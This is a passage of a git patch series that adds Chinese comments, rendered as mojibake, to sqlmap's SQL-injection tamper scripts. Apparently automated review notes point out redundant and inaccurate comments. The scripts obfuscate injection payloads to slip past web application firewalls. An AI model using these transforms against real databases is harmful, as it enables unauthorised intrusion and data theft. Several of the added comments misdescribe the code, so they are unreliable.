quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿 elif payload[i] == '"': + # 灏哾oublequote鍙栧弽 doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝涓斾笉鍦ㄥ弻寮曞彿鍐呭拰鍗曞紩鍙峰唴 elif payload[i] == " " and not doublequote and not quote: + # 灏嗕竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗︽坊鍔犲埌retVal涓 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal 
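Review bot: Nearly every line of this loop now carries a comment that restates the statement below it (`# 鍚﹀垯` above `else:`, `# 杩斿洖retVal` above `return retVal`, a comment above `break` saying it breaks), which adds reading cost without adding information; the same pattern appears in the space2mysqlblank.py hunk on this line and in the space2mysqldash.py, space2hash.py and space2dash.py hunks later in the series. One comment stating the intent is enough, e.g. `# replace each whitespace with '%23%0A' (a '#' comment plus newline); copy the payload's own trailing comment verbatim` above the `for` loop, and the line-by-line restatements can be dropped. The enclosing `tamper` function starts outside this hunk.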
diff --git a/src/sqlmap-master/tamper/space2mysqldash.py b/src/sqlmap-master/tamper/space2mysqldash.py index 7b64776..deffbff 100644 --- a/src/sqlmap-master/tamper/space2mysqldash.py +++ b/src/sqlmap-master/tamper/space2mysqldash.py @@ -7,14 +7,20 @@ See the file 'LICENSE' for copying permission import os +# 浠巐ib.core.common妯″潡涓鍏ingleTimeWarnMessage鍑芥暟 from lib.core.common import singleTimeWarnMessage +# 浠巐ib.core.compat妯″潡涓鍏range鍑芥暟 from lib.core.compat import xrange +# 浠巐ib.core.enums妯″潡涓鍏BMS鏋氫妇鍜孭RIORITY鏋氫妇 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 璁剧疆鑴氭湰鐨勪紭鍏堢骇涓篖OW __priority__ = PRIORITY.LOW +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庢鏌ヨ剼鏈緷璧 def dependencies(): + # 杈撳嚭璀﹀憡淇℃伅锛岃鏄庤鑴氭湰鍙兘鐢ㄤ簬MySQL鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -34,14 +40,24 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload涓嶄负绌 if payload: + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏"--%0A"娣诲姞鍒皉etVal涓 retVal += "--%0A" + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload鐨勫墿浣欓儴鍒嗘坊鍔犲埌retVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯 else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal From 01d9031e655358e3482dc3514dca07999fa7ac63 Mon Sep 17 00:00:00 2001 
From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:28:11 +0800 Subject: [PATCH 9/9] sck --- src/sqlmap-master/tamper/randomcomments.py | 15 ++++++++++----- src/sqlmap-master/tamper/schemasplit.py | 3 ++- src/sqlmap-master/tamper/scientific.py | 4 +++- src/sqlmap-master/tamper/sleep2getlock.py | 1 + src/sqlmap-master/tamper/sp_password.py | 3 +++ src/sqlmap-master/tamper/space2comment.py | 14 ++++++++------ src/sqlmap-master/tamper/space2dash.py | 16 ++++++++++++++-- src/sqlmap-master/tamper/space2hash.py | 13 +++++++++++++ src/sqlmap-master/tamper/space2morecomment.py | 6 ++++++ 9 files changed, 60 insertions(+), 15 deletions(-) diff --git a/src/sqlmap-master/tamper/randomcomments.py b/src/sqlmap-master/tamper/randomcomments.py index edf4cba..b0963a3 100644 --- a/src/sqlmap-master/tamper/randomcomments.py +++ b/src/sqlmap-master/tamper/randomcomments.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission import re +# 浠巗qlmap鐨勫簱涓鍏ラ殢鏈鸿寖鍥村嚱鏁般佸吋瀹规ā鍧椾腑鐨剎range鍑芥暟銆佺煡璇嗗簱鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import randomRange from lib.core.compat import xrange from lib.core.data import kb @@ -27,24 +28,28 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔壘鍒皃ayload涓殑鎵鏈夊崟璇嶏紙鑷冲皯涓涓瓧姣嶆垨涓嬪垝绾匡級 for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() + # 璺宠繃闀垮害灏忎簬2鐨勫崟璇 if len(word) < 2: continue + # 濡傛灉鍗曡瘝鏄疭QL鍏抽敭瀛 if word.upper() in kb.keywords: - _ = word[0] - + _ = word[0] # 浠庡崟璇嶇殑绗竴涓瓧绗﹀紑濮嬫瀯閫犳柊鐨勫瓧绗︿覆 + # 閬嶅巻鍗曡瘝鐨勬瘡涓瓧绗︼紙闄や簡绗竴涓拰鏈鍚庝竴涓級 for i in xrange(1, len(word) - 1): + # 闅忔満鍐冲畾鏄惁鎻掑叆娉ㄩ噴 _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) - + # 娣诲姞鍗曡瘝鐨勬渶鍚庝竴涓瓧绗 _ += word[-1] - + # 濡傛灉娌℃湁鎻掑叆浠讳綍娉ㄩ噴锛屽垯闅忔満閫夋嫨涓涓綅缃彃鍏ユ敞閲 if "/**/" not in _: index = randomRange(1, len(word) - 1) _ = word[:index] + "/**/" + word[index:] - + # 灏嗗師濮嬬殑鍗曡瘝鏇挎崲涓烘彃鍏ヤ簡娉ㄩ噴鐨勬柊瀛楃涓 retVal = retVal.replace(word, _) return retVal 
diff --git a/src/sqlmap-master/tamper/schemasplit.py b/src/sqlmap-master/tamper/schemasplit.py index 07ad37d..8245f08 100644 --- a/src/sqlmap-master/tamper/schemasplit.py +++ b/src/sqlmap-master/tamper/schemasplit.py @@ -27,5 +27,6 @@ def tamper(payload, **kwargs): >>> tamper('SELECT id FROM testdb.users') 'SELECT id FROM testdb 9.e.users' """ - + # 濡傛灉payload涓嶄负绌猴紝鍒欎娇鐢ㄦ鍒欒〃杈惧紡鏇挎崲FROM鍚庨潰鏁版嵁搴撹〃鍚嶇殑鐐规搷浣滅涓轰竴涓┖鏍煎姞涓'9.e.' + # 杩欐槸涓绉嶇粫杩囨煇浜沇AF瑙勫垯鐨勬妧鏈紝閫氳繃鎻掑叆涓涓湅浼兼棤瀹崇殑瀛楃涓'9.e.'鏉ュ垎鍓叉暟鎹簱鍚嶅拰琛ㄥ悕 return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/scientific.py b/src/sqlmap-master/tamper/scientific.py index 9b0ecf7..514b582 100644 --- a/src/sqlmap-master/tamper/scientific.py +++ b/src/sqlmap-master/tamper/scientific.py @@ -29,7 +29,9 @@ def tamper(payload, **kwargs): """ if payload: + # 灏嗛棴鍚堟嫭鍙枫侀楀彿銆佺偣銆佹槦鍙枫佹鏂滄潬銆佸弽鏂滄潬銆佺珫绾裤佷綅杩愮畻绗﹀拰閫昏緫杩愮畻绗︽浛鎹负" 1.e" + 鍘熷瓧绗 payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload) + # 灏嗗嚱鏁板悕鍚庤窡宸︽嫭鍙锋浛鎹负" 鍑芥暟鍚 1.e("锛岄櫎闈炲嚱鏁板悕鏄疢ID銆丆AST銆丗ROM銆丆OUNT payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure - + # 杩斿洖淇敼鍚庣殑payload return payload diff --git a/src/sqlmap-master/tamper/sleep2getlock.py b/src/sqlmap-master/tamper/sleep2getlock.py index f0b3a54..a3e35e1 100644 --- a/src/sqlmap-master/tamper/sleep2getlock.py +++ b/src/sqlmap-master/tamper/sleep2getlock.py @@ -34,6 +34,7 @@ def tamper(payload, **kwargs): """ if payload: + # 灏唒ayload涓殑'SLEEP('鏇挎崲涓'GET_LOCK('%s',锛屽叾涓'%s'浼氳kb.aliasName鏇挎崲 payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName) return payload diff --git a/src/sqlmap-master/tamper/sp_password.py b/src/sqlmap-master/tamper/sp_password.py index d23c0d5..30cc2bf 100644 --- a/src/sqlmap-master/tamper/sp_password.py +++ b/src/sqlmap-master/tamper/sp_password.py 
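Review bot: The comment above the first `re.sub` in scientific.py lists a backslash among the characters matched by `[),.*^/|&]`, but the class contains no backslash; `^` there is the caret (XOR) operator and `&`/`|` are the bitwise operators. Suggest `# insert the scientific-notation fragment ' 1.e' before each of ) , . * ^ / | &`, matching the English `# NOTE: MID and CAST don't work for sure` comment already on the next line. The enclosing `tamper` function starts outside this hunk.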
@@ -27,6 +27,9 @@ def tamper(payload, **kwargs): retVal = "" if payload: + # 鏋勯犺繑鍥炵殑payload瀛楃涓 + # 濡傛灉payload涓凡缁忓寘鍚敞閲婄鍙('#'鎴'--')锛屽垯鐩存帴娣诲姞sp_password鍑芥暟 + # 鍚﹀垯锛屽湪sp_password鍓嶆坊鍔犱竴涓'-- '浣滀负娉ㄩ噴 retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "") return retVal diff --git a/src/sqlmap-master/tamper/space2comment.py b/src/sqlmap-master/tamper/space2comment.py index 3229a5c..231bb1b 100644 --- a/src/sqlmap-master/tamper/space2comment.py +++ b/src/sqlmap-master/tamper/space2comment.py @@ -4,7 +4,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ - +# 浠巗qlmap鐨勫簱涓鍏ュ吋瀹规ā鍧椾腑鐨剎range鍑芥暟鍜屼紭鍏堢骇鏋氫妇 from lib.core.compat import xrange from lib.core.enums import PRIORITY @@ -33,26 +33,28 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = "" + retVal = "" # 鍒濆鍖栧紩鍙风姸鎬佹爣璁 quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉鏄涓涓┖鏍间笖涔嬪墠娌℃湁閬囧埌杩囩┖鏍 if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**/" continue - + # 濡傛灉鏄崟寮曞彿 elif payload[i] == '\'': quote = not quote - + # 濡傛灉鏄弻寮曞彿 elif payload[i] == '"': doublequote = not doublequote - + # 濡傛灉鏄┖鏍间笖涔嬪墠娌℃湁閬囧埌杩囧弻寮曞彿鍜屽崟寮曞彿 elif payload[i] == " " and not doublequote and not quote: retVal += "/**/" continue - + # 娣诲姞褰撳墠瀛楃鍒皉etVal retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2dash.py b/src/sqlmap-master/tamper/space2dash.py index 5ecb814..298d26f 100644 --- a/src/sqlmap-master/tamper/space2dash.py +++ b/src/sqlmap-master/tamper/space2dash.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import random import string +# 浠巗qlmap鐨勫簱涓鍏ュ吋瀹规ā鍧椾腑鐨剎range鍑芥暟鍜屼紭鍏堢骇鏋氫妇 from lib.core.compat import xrange from lib.core.enums import PRIORITY 
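Review bot: In the space2comment.py hunk the trailing comment attached to `retVal = ""` describes the quote-state flags, which are initialised on the next line (`quote, doublequote, firstspace = False, False, False`), so it should move there or be dropped. The comment above `elif payload[i] == " " and not doublequote and not quote:` says no quote was encountered before, but the flags toggle on every quote character, so the condition means the space is not currently inside a quoted string: `# a space outside any quoted string becomes an inline comment`. The enclosing `tamper` function starts outside this hunk.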
@@ -30,18 +31,29 @@ def tamper(payload, **kwargs): >>> tamper('1 AND 9227=9227') '1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227' """ - + retVal = "" if payload: + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): - if payload[i].isspace(): + # 濡傛灉褰撳墠瀛楃鏄┖鏍 + if payload[i].isspace(): + # 鐢熸垚涓涓殢鏈哄瓧绗︿覆 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 灏嗛殢鏈哄瓧绗︿覆鍜屾崲琛岀娣诲姞鍒皉etVal涓 retVal += "--%s%%0A" % randomStr + + # 濡傛灉褰撳墠瀛楃鏄#鎴栬#鍚庨潰璺熺潃涓や釜绌烘牸 + # 濡傛灉payload[i]绛変簬#鎴栬卲ayload[i:i + 3]绛変簬-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload[i:]娣诲姞鍒皉etVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯锛屽皢payload[i]娣诲姞鍒皉etVal涓 else: retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/space2hash.py b/src/sqlmap-master/tamper/space2hash.py index 2cef84d..348fd20 100644 --- a/src/sqlmap-master/tamper/space2hash.py +++ b/src/sqlmap-master/tamper/space2hash.py @@ -16,7 +16,9 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬妫鏌ヨ剼鏈緷璧 def dependencies(): + # 杈撳嚭璀﹀憡淇℃伅锛屾彁绀鸿剼鏈彧鑳借繍琛屽湪MySQL鏁版嵁搴撲笂 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -41,15 +43,26 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload涓嶄负绌 if payload: + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍 if payload[i].isspace(): + # 鐢熸垚涓涓殢鏈哄瓧绗︿覆 randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 灏嗛殢鏈哄瓧绗︿覆娣诲姞鍒皉etVal涓 retVal += "%%23%s%%0A" % randomStr + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload鐨勫墿浣欓儴鍒嗘坊鍔犲埌retVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯 else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal 
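Review bot: The first of the two comments above `elif payload[i] == '#' or payload[i:i + 3] == '-- ':` claims the branch matches a `#` followed by two spaces, which the condition does not do (it tests for `#` or the `-- ` sequence), and the second comment merely restates the code; keep one accurate line such as `# stop rewriting at the payload's own comment marker and copy the rest verbatim`. The `if payload[i].isspace():` line is removed and re-added with no visible textual difference, which looks like a whitespace-only change; worth confirming the indentation inside the `for` body is unchanged. The enclosing `tamper` function starts outside this hunk.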
diff --git a/src/sqlmap-master/tamper/space2morecomment.py b/src/sqlmap-master/tamper/space2morecomment.py index c5d7ec4..7cffc12 100644 --- a/src/sqlmap-master/tamper/space2morecomment.py +++ b/src/sqlmap-master/tamper/space2morecomment.py @@ -33,23 +33,29 @@ def tamper(payload, **kwargs): retVal = "" quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉绗竴涓瓧绗︿笉鏄┖鏍硷紝鍒欏皢firstspace璁剧疆涓篢rue锛屽苟灏唕etVal娣诲姞"/**_**/" if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**_**/" continue + # 濡傛灉瀛楃鏄崟寮曞彿锛屽垯灏唓uote鍙栧弽 elif payload[i] == '\'': quote = not quote + # 濡傛灉瀛楃鏄弻寮曞彿锛屽垯灏哾oublequote鍙栧弽 elif payload[i] == '"': doublequote = not doublequote + # 濡傛灉瀛楃鏄┖鏍硷紝涓斾笉鏄湪鍙屽紩鍙锋垨鍗曞紩鍙蜂腑锛屽垯灏唕etVal娣诲姞"/**_**/" elif payload[i] == " " and not doublequote and not quote: retVal += "/**_**/" continue + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] return retVal
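Review bot: The comment above `if not firstspace:` says firstspace is set when the first character is not a space, but the code sets it on the first whitespace character encountered and replaces that character with `/**_**/`; quote tracking only starts afterwards. Suggest `# the first whitespace is always replaced; quote tracking starts after it` for that branch, and the comments on the `'\''` and `'"'` branches would be more useful stating why the flags exist rather than that they toggle: `# track whether we are inside a quoted string so spaces there are left alone`. The enclosing `tamper` function starts outside this hunk.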